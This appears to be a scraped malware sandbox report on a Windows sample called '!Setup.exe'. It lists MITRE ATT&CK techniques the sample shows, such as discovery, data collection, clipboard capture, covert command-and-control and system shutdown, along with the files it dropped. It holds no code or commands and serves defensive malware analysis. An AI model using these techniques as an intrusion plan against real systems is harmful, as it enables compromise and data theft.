Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report !Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\V

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Access

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Availability

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Available

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Balanced

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bids

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Campaigns

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Campaigns.cmd (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ceo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Designed

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dir

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ec

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ford

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fwd

Windows Analysis Report
!Setup.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre